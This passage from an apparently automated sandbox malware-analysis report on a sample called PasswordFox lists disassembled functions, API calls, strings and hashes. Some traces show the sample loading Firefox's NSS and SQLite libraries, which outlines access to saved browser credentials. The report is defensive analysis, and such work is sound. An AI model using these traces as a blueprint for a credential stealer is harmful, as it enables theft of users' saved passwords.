                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$Cursor_snwprintf$FocusLoadTextWindowmemsetwcscat
                                        • String ID: %s: %s$PasswordFox
                                        • API String ID: 2693631882-2734655586
                                        • Opcode ID: 2561c9ff1a4fe73ce722754cd3fec9add366b1b7e3f511ac2ce4350fe42e45da
                                        • Instruction ID: 28f868805ce7f300f7a35ba6660182de6f0c9a572cbba210cc35c352a1e02ed8
                                        • Opcode Fuzzy Hash: 2561c9ff1a4fe73ce722754cd3fec9add366b1b7e3f511ac2ce4350fe42e45da
                                        • Instruction Fuzzy Hash: F0213A71640208AFE320AB65CD89FA677EEFF48304F0100B9F55DAB5A2CB716C558F54
                                        Function 0040907C Relevance: 16.6, APIs: 11, Instructions: 146windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 004090F8
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00409106
                                        • SelectObject.GDI32(?,?), ref: 0040911B
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 00409151
                                        • SelectObject.GDI32(00000014,00000000), ref: 0040915B
                                          • Part of subcall function 00408F10: GetCursorPos.USER32(?), ref: 00408F1D
                                          • Part of subcall function 00408F10: GetSubMenu.USER32(?,00000000), ref: 00408F2B
                                          • Part of subcall function 00408F10: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00408F58
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409176
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040917F
                                        • SetCursor.USER32(00000000), ref: 00409186
                                        • PostMessageW.USER32(?,0000041C,00000000,00000000), ref: 004091A8
                                        • SetFocus.USER32(?), ref: 004091DD
                                        • SetFocus.USER32(?), ref: 00409244
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrack
                                        • String ID:
                                        • API String ID: 3230168590-0
                                        • Opcode ID: 79913bb0ae7908b1afa49cf06df9eb51bff68f541d465b13dfec1c32defbd00a
                                        • Instruction ID: f9130b7363a63fa1dd0b9d48565e412759fc459cce7eecf89893da159909f402
                                        • Opcode Fuzzy Hash: 79913bb0ae7908b1afa49cf06df9eb51bff68f541d465b13dfec1c32defbd00a
                                        • Instruction Fuzzy Hash: 9551A071600206FFDB149FA4C988AAA7775BB48310F10067AF525BB2E2C738AC51DF99
                                        Function 00405568 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                        • String ID: 0$6
                                        • API String ID: 4066108131-3849865405
                                        • Opcode ID: b6caae16324956fea7a1c4035ed61f7a3c60bedf070798a807fcdaab4c85fed2
                                        • Instruction ID: 4f496d6a710761ec625949cb3b7857caba8e1bb3d452f86d9d6fc5bdc1e7d867
                                        • Opcode Fuzzy Hash: b6caae16324956fea7a1c4035ed61f7a3c60bedf070798a807fcdaab4c85fed2
                                        • Instruction Fuzzy Hash: 2E319C72408304AFDB209F91D880A9BB7E8EF84314F40493EF988A2291D339D905CF9A
                                        Function 004025F0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 0040260F
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402621
                                        • FreeLibrary.KERNEL32(00000000), ref: 00402635
                                        • 6F551CD0.COMCTL32 ref: 00402643
                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402660
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressF551FreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 269827459-317687271
                                        • Opcode ID: 1a228f069c8e191ef87cd7f52c1f45f5c19ff6b9c2c00f2d2f5da7869437e64b
                                        • Instruction ID: 26794b545e1ef44de9f43929d311897303b1a6ca7faf20d8154e529f8b560f2f
                                        • Opcode Fuzzy Hash: 1a228f069c8e191ef87cd7f52c1f45f5c19ff6b9c2c00f2d2f5da7869437e64b
                                        • Instruction Fuzzy Hash: 1801D671751601EAD3115BB09DCDB6B799CDF41749B10023AE502F22C0EBF9CD018A6D
                                        Function 00409E76 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E85
                                        • GetModuleHandleW.KERNEL32(sqlite3.dll,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E8E
                                        • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409E97
                                        • FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EA6
                                        • FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EAD
                                        • FreeLibrary.KERNEL32(00000000,?,74DEF3A0,00409FCC,?,?,?,?,?,00000000), ref: 00409EB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHandleLibraryModule
                                        • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                        • API String ID: 662261464-3550686275
                                        • Opcode ID: 65bb279b1682e9eef8c69532225dc9fc0058e63144ed11cb9bbc0510ad60409b
                                        • Instruction ID: 08c439e0005e5b6272bef9f9fc045148d78c5181b00ef59778e5949af8958093
                                        • Opcode Fuzzy Hash: 65bb279b1682e9eef8c69532225dc9fc0058e63144ed11cb9bbc0510ad60409b
                                        • Instruction Fuzzy Hash: 24E04823E4136DA6CA10A7F59D84D2B7E5CDCC5AE13150437AD00732D29EBD5C0149F9
                                        Function 00401B06 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: free$wcslen
                                        • String ID:
                                        • API String ID: 3592753638-3916222277
                                        • Opcode ID: ddb550bc4d18b6149fc12f57054d732c8a3faa90f620d1426dd72524d1c7f83f
                                        • Instruction ID: 7b97a1965dd34fe5720687fb37fcb42d93b5fc4f6429c7fb3a30afb56e8cdd22
                                        • Opcode Fuzzy Hash: ddb550bc4d18b6149fc12f57054d732c8a3faa90f620d1426dd72524d1c7f83f
                                        • Instruction Fuzzy Hash: 1D61343040C3469BEB68AF11D58442BB7B1FF84716F90093FF482A62A1E779D985CB4E
                                        Function 004053F1 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                        • wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004058E3: memset.MSVCRT ref: 004058F6
                                          • Part of subcall function 004058E3: _itow.MSVCRT ref: 00405904
                                        • wcslen.MSVCRT ref: 00405490
                                        • GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                        • LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                        • memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,004053FF,00402460,PasswordFox), ref: 00405389
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053A7
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053C5
                                          • Part of subcall function 0040534F: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053E3
                                        Strings
                                        • strings, xrefs: 00405468
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00405405
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                        • API String ID: 3166385802-4125592482
                                        • Opcode ID: e7925b7c639ce5ccb6452d2b9abfb092da25b9a53f1a0af1939cc833b4a1da7c
                                        • Instruction ID: e34ee92e24309c31d70f713afcde4bed0f03b1ba035f10be4a3659d8cbe9581e
                                        • Opcode Fuzzy Hash: e7925b7c639ce5ccb6452d2b9abfb092da25b9a53f1a0af1939cc833b4a1da7c
                                        • Instruction Fuzzy Hash: 51414F75240901BBC716DB14EC95AAB3366E784345B10843AEC06A72A1DEBEA9C2CF5C
                                        Function 00404191 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002), ref: 004041B6
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 004041D4
                                        • wcslen.MSVCRT ref: 004041E1
                                        • wcscpy.MSVCRT ref: 004041F1
                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 004041FB
                                        • wcscpy.MSVCRT ref: 0040420B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2767993716-572158859
                                        • Opcode ID: 80139e6b532b94f01ce9ce1e1c92038c37d2584c8a9306761def94e999b5e351
                                        • Instruction ID: e1356e26e723054dae363e03e241d1f330764c7fffbd77785f60b69d870017c2
                                        • Opcode Fuzzy Hash: 80139e6b532b94f01ce9ce1e1c92038c37d2584c8a9306761def94e999b5e351
                                        • Instruction Fuzzy Hash: 2501F771600114FAD7146790ED4AE9F7A6CDB44795B20417AFA01B41D2DB395F40D6AC
                                        Function 00405D70 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404530: GetFileAttributesW.KERNELBASE(00000000,004034E5,00000000), ref: 00404534
                                        • wcscpy.MSVCRT ref: 00405D8A
                                        • wcscpy.MSVCRT ref: 00405D9A
                                        • GetPrivateProfileIntW.KERNEL32(0040FDA8,rtl,00000000,0040FB98), ref: 00405DAB
                                          • Part of subcall function 0040591A: GetPrivateProfileStringW.KERNEL32(0040FDA8,?,0040C3EC,0040FE30,?,0040FB98), ref: 00405936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 3176057301-2039793938
                                        • Opcode ID: c2e55dc3a3a1f1d25c9100fd84f627f34b5cdf161f278e115aa86b060eee7ff2
                                        • Instruction ID: 6ff666b2312f51737588b3cf453df67747fbdff2f9c4fbd940fa7efab882ce8e
                                        • Opcode Fuzzy Hash: c2e55dc3a3a1f1d25c9100fd84f627f34b5cdf161f278e115aa86b060eee7ff2
                                        • Instruction Fuzzy Hash: 1EF09622ED1221B6D6203731AC47F2B3524CF92B25F54823BB948766D3DA7C5E058ADD
                                        Function 00406319 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406114
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406122
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406133
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 0040614A
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406153
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406359
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00406375
                                        • memcpy.MSVCRT(?,0040F098,00000014), ref: 0040639A
                                        • memcpy.MSVCRT(?,0040F084,00000014,?,0040F098,00000014), ref: 004063AE
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406431
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040643B
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406473
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                          • Part of subcall function 004053F1: LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                          • Part of subcall function 004053F1: memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                          • Part of subcall function 004053F1: wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004053F1: wcslen.MSVCRT ref: 00405490
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: ($d
                                        • API String ID: 1140211610-1915259565
                                        • Opcode ID: cc611055cbc00d40441fd59cb1f3185aa6fff62fb04399cc1b0be723267b4483
                                        • Instruction ID: c149448ff439af1a23248ab9c20f5614ad1bca10517fdd128314e281d934c264
                                        • Opcode Fuzzy Hash: cc611055cbc00d40441fd59cb1f3185aa6fff62fb04399cc1b0be723267b4483
                                        • Instruction Fuzzy Hash: 2A515972601700AFD724DF2AC586A5AB7E4FF48314F10853EE55ADB3D1DB78E9408B48
                                        Function 004038F8 Relevance: 13.6, APIs: 9, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403923
                                        • memset.MSVCRT ref: 00403937
                                        • _mbscpy.MSVCRT(?), ref: 00403951
                                        • _mbscpy.MSVCRT(?,?), ref: 00403996
                                        • _mbscpy.MSVCRT(?,00001000,?,?), ref: 004039AA
                                        • _mbscpy.MSVCRT(?,?,?,00001000,?,?), ref: 004039BD
                                        • wcscpy.MSVCRT ref: 004039CC
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 004039F3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00403A09
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                        • String ID:
                                        • API String ID: 59245283-0
                                        • Opcode ID: d9ceb4d61dd339e9f3ccf083ac235a8309192dc98f2fac4bce5a5254fec8cc2d
                                        • Instruction ID: a36109ca0726fc38a0f1bfd74a5c08f45524f924bc412f38d8147f3413982100
                                        • Opcode Fuzzy Hash: d9ceb4d61dd339e9f3ccf083ac235a8309192dc98f2fac4bce5a5254fec8cc2d
                                        • Instruction Fuzzy Hash: 773153B280011DABDB20DB54CC81FEA77BCFB04358F0445AAB959E3181DB34AB448FA8
                                        Function 004038FA Relevance: 13.6, APIs: 9, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403923
                                        • memset.MSVCRT ref: 00403937
                                        • _mbscpy.MSVCRT(?), ref: 00403951
                                        • _mbscpy.MSVCRT(?,?), ref: 00403996
                                        • _mbscpy.MSVCRT(?,00001000,?,?), ref: 004039AA
                                        • _mbscpy.MSVCRT(?,?,?,00001000,?,?), ref: 004039BD
                                        • wcscpy.MSVCRT ref: 004039CC
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 004039F3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00403A09
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                        • String ID:
                                        • API String ID: 59245283-0
                                        • Opcode ID: 7f4b22131dff1f3b90c5f8b9439278ad1a1ba1842d8059aec2b2cc0d3d17a81d
                                        • Instruction ID: 651ebfe4d8686ab00d6d8292f5afd2682983f6326ab148555fa5b6b6826b63c5
                                        • Opcode Fuzzy Hash: 7f4b22131dff1f3b90c5f8b9439278ad1a1ba1842d8059aec2b2cc0d3d17a81d
                                        • Instruction Fuzzy Hash: 2A3165B280011DABDB20DB54CC81FEA77BCFB04358F0445BAB959E3181DB34AB448FA8
                                        Function 0040AEE6 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,004072DA,?,?), ref: 0040AF1D
                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,004072DA,?,?), ref: 0040AF49
                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004072DA,?,?), ref: 0040AF63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 1b3d7cfcd1d93c2aacca216e0e1b7c9728f3e8663702d8ac47ded56eca963c46
                                        • Instruction ID: 416d8c46835b4c1c04a167e830ff4e0fd7d22b0ad497b06718149a879596d325
                                        • Opcode Fuzzy Hash: 1b3d7cfcd1d93c2aacca216e0e1b7c9728f3e8663702d8ac47ded56eca963c46
                                        • Instruction Fuzzy Hash: 0B0128C2E4836360D73021558C42F770214D763761FA50637FD8A352C5E2BE0E67419F
                                        Function 00404C22 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00404C43
                                        • _snwprintf.MSVCRT ref: 00404C71
                                        • wcslen.MSVCRT ref: 00404C7D
                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404C95
                                        • wcslen.MSVCRT ref: 00404CA3
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404CB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
